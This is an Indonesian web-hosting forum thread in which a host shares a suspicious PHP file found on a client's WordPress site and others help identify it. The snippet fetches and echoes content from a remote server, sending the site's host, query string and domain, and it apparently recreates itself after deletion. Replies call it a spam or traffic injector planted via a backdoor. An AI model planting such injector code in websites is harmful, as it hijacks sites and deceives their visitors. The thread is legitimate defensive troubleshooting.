ada yang tau script ini ??

Discussion in 'Masalah Teknik dan Keamanan' started by pangeran1995, 10 Jan 2016.

Thread Status:
Not open for further replies.
  1. pangeran1995

    pangeran1995 Hosting Guru

    Messages:
    1,352
    Likes Received:
    105
    Trophy Points:
    63
    saya menemukan sebuah file aneh di website client isinya seperti ini

    <?php
    set_time_limit(0);

    header("Content-Type: text/html;charset=gb2312");
    date_default_timezone_set('PRC');
    $Remote_server = "http://hulunbeier.xigua668.com/";
    $host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
    $Content_mb=file_get_contents($Remote_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);

    echo $Content_mb;

    ?>

    =======================
    karena script ini memakan EntryProses 100 dan Ram cukup tinggi 3Gb karena saya limit akun tersebut segitu
    untuk CPU nol tanpa proses akan tetapi bagian bengkak hanya di entryproses dan Ram saja.
    ketika saya hapus filenya dia akan membuat ulang file tersebut. ketika di ubah permission dari 0444 menjadi 0644 akan tetapi sama saja menjadi 0444 kembali setelah di reffress

    mungkin ada yang ngalami??
     
  2. jaapns

    jaapns Hosting Guru Web Hosting

    Messages:
    3,258
    Likes Received:
    443
    Trophy Points:
    83
    di chmod 0000 saja folder nya dari root
     
  3. Mylo Sepz

    Mylo Sepz Apprentice 2.0

    Messages:
    532
    Likes Received:
    59
    Trophy Points:
    28
  4. mas.satriyo

    mas.satriyo Expert 2.0

    Messages:
    953
    Likes Received:
    138
    Trophy Points:
    43
  5. Mylo Sepz

    Mylo Sepz Apprentice 2.0

    Messages:
    532
    Likes Received:
    59
    Trophy Points:
    28
    bisa jadi. pengen naikin visitor dengan cepat ya tinggal sisipin php diatas ke web orang. biasanya ya yang nulled-nulled atau dia backdoor terus sisipin deh.
     
  6. junior riau

    junior riau Hosting Guru Web Hosting

    Messages:
    3,227
    Likes Received:
    514
    Trophy Points:
    113
    making own visitor sepertinya visitor generator
     
  7. mas.satriyo

    mas.satriyo Expert 2.0

    Messages:
    953
    Likes Received:
    138
    Trophy Points:
    43
    soalnya nulled-er yg rada 'sopan' biasanya cuma nyisip backlink doang :D
    kalo yg rusuh sih sekalian pasang backdoor
    itu bisa re-create otomatis berarti ada 'temennya'
    ada script autogenerate-nya
     
  8. dhyhost

    dhyhost Hosting Guru Web Hosting

    Messages:
    3,927
    Likes Received:
    613
    Trophy Points:
    113
    berari induknya harus dihapus juga...
    atau bisa di chmod aja ke 000 dari rootnya
     
  9. pangeran1995

    pangeran1995 Hosting Guru

    Messages:
    1,352
    Likes Received:
    105
    Trophy Points:
    63
    saya bertanya kepada pelanggan
    dia bilang tidak nulled hanya aja pernah kena injeck di wordpressnya sebelum pindah hosting :D
    dan saya cek ricek ternyata ada script bgtu
     
  10. pangeran1995

    pangeran1995 Hosting Guru

    Messages:
    1,352
    Likes Received:
    105
    Trophy Points:
    63
    saya cari2 temennya gak ketemu.. padahal udah ubek2 semua folder :D
     
Loading...
Thread Status:
Not open for further replies.

Share This Page

Loading...